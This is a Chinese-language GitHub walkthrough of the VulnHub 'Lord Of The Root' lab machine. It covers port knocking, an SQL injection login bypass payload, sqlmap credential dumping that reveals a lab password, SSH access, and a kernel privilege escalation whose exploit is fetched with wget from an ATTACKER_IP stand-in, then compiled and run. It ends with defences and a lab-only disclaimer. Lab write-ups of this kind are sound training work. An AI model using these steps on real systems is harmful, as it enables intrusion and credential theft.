Salik921/Lord-Of-The-Root---VulnHub-Walkthrough

GitHub: Salik921/Lord-Of-The-Root---VulnHub-Walkthrough

记录攻克 VulnHub 靶机「Lord Of The Root」的完整渗透过程，涵盖 SQL 注入利用、凭据导出与内核提权等关键技术。

Stars: 0 | Forks: 0

# 👑 Lord Of The Root — VulnHub 攻略利用 SQL 注入漏洞绕过身份验证，使用 SQLMap 导出数据库凭据，以合法用户身份获取 SSH 访问权限，并通过本地内核提权漏洞将权限提升至 root。 # 📌 概述本仓库包含了对 **Lord Of The Root** 靶机从初始侦察到完全获取 root 权限的完整攻略。 ## ⚔ 攻击链 - 🔓 端口试探 - 💉 SQL 注入绕过身份验证 - 🗄 数据库枚举 - 🔑 凭据复用 - 👑 本地权限提升 # 🛠 使用的工具 | 工具 | 用途 | |---|---| | Nmap | 端口扫描与服务识别 | | Knock | 端口试探 | | FFUF | 目录枚举 | | Burp Suite | 请求拦截与 SQLi 测试 | | SQLMap | 自动化 SQL 注入利用 | | Searchsploit | 权限提升研究 | | GCC | 编译本地漏洞利用程序 | | SSH | 远程访问 | # 🔎 侦察使用 Nmap 进行了初始扫描： ``` nmap -sC -sV -p- 192.168.10.7 ``` ## 📸 截图 ![Nmap 扫描](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/nmap-scan.png) ### 结果 ``` 22/tcp open ssh ``` 尝试进行 SSH 访问： ``` ssh 192.168.10.7 ``` 发现了一条提示： ``` Easy as 1 2 3 ``` # 🚪 端口试探使用了 Knock 工具： ``` knock -v 192.168.10.7 1 2 3 ``` 再次执行 Nmap 扫描： ``` nmap -p- 192.168.10.7 ``` ## 📸 截图 ![端口试探](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/port-knocking.png) ### 发现新端口 ``` 1337/tcp open http ``` # 🌐 Web 枚举访问 Web 服务： ``` http://192.168.10.7:1337 ``` 使用 FFUF 进行目录模糊测试： ``` ffuf -u http://192.168.10.7:1337/FUZZ -w /usr/share/wordlists/dirb/common.txt ``` ## 📸 截图 ![FFUF 输出](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/ffuf-output.png) 发现了一个隐藏文件： ``` 404.html ``` # 🔐 解码隐藏信息页面源码中包含一条双重 Base64 编码的信息。使用以下命令进行解码： ``` echo "ENCODED_TEXT" | base64 -d ``` ## 📸 截图 ![解码过程](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/decoding-process.png) 发现的隐藏目录： ``` /978345210/index.php ``` # 🔑 发现登录面板隐藏的登录面板： ``` http://192.168.10.7:1337/978345210/index.php ``` ## 📸 截图 ![登录面板](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/login-panel.png) # 💉 SQL 注入绕过身份验证使用的 Payload： ``` ' OR 1=1-- - ``` 成功绕过身份验证。 ## 📸 截图 ![Burp SQLi](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/burp-sqli.png) # 🗄 使用 SQLMap 进行数据库枚举保存抓取到的请求为： ``` root1.txt ``` 识别数据库： ``` sqlmap -r root1.txt --dbs ``` 提取数据表： ``` sqlmap -r root1.txt -D webapp --tables ``` 导出凭据： ``` sqlmap -r root1.txt -D webapp -T users --dump ``` ## 📸 截图 ![SQLMap 导出](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/sqlmap-dump.png) ### 发现的凭据 ``` Username: smeagol Password: MyPreciousR00t ``` # 🖥 初始 Shell 访问 SSH 登录： ``` ssh smeagol@192.168.10.7 ``` ## 📸 截图 ![SSH 访问](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/ssh-access.png) # 🔍 系统枚举收集系统信息： ``` uname -a ``` ``` lsb_release -a ``` ### 结果 ``` Ubuntu 14.04 ``` # 👑 权限提升搜索本地漏洞利用程序： ``` searchsploit ubuntu 14.04 ``` 识别出的漏洞利用程序： ``` 39166.c ``` 传输漏洞利用程序： ``` wget http://ATTACKER_IP/39166.c ``` 编译漏洞利用程序： ``` gcc 39166.c -o exploit ``` 执行漏洞利用程序： ``` ./exploit ``` ## 📸 截图 ![权限提升](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/privilege-escalation.png) # 💀 成功获取 Root 权限成功获取 Root shell。 ``` root@LordOfTheRoot:/# ``` ## 📸 截图 ![Root Shell](https://raw.githubusercontent.com/Salik921/Lord-Of-The-Root---VulnHub-Walkthrough/main/screenshots/root-shell.png) # 🛡 防御措施 - 禁用不必要的端口试探暴露 - 对用户输入进行过滤以防范 SQL 注入 - 使用参数化查询 - 使用强哈希算法安全地存储密码 - 保持 Linux 内核更新 - 限制对敏感文件和隐藏目录的访问 - 部署 Web 应用防火墙 (WAF) # 🧠 经验总结该靶机演示了： - 真实的枚举技术 - 隐藏服务的重要性 - SQL 注入利用工作流 - 凭据收集 - Linux 权限提升方法论 - 串联多个漏洞实现完全入侵 # ⚠ 免责声明本攻略仅出于教育目的，且仅供经授权的实验室环境使用。 👨‍💻 作者 salik921 💻 渗透测试爱好者 🔥 红队学习人员 🛡 Web 漏洞利用与权限提升 ### ⭐ 如果您觉得此攻略有用，请给本仓库点个 Star ⭐

标签：Burp Suite, CISA项目, CTI, FFUF, Lord Of The Root, MISP, Nmap, SQLMap, SSH访问, StruQ, VulnHub, Web安全, Web报告查看器, 内存分配, 协议分析, 安全测试, 提权, 攻击性安全, 数据库拖库, 本地内核漏洞, 权限提升, 目录枚举, 移动安全, 端口碰撞, 网络安全, 网络安全审计, 蓝队分析, 虚拟驱动器, 身份验证绕过, 隐私保护, 靶机实战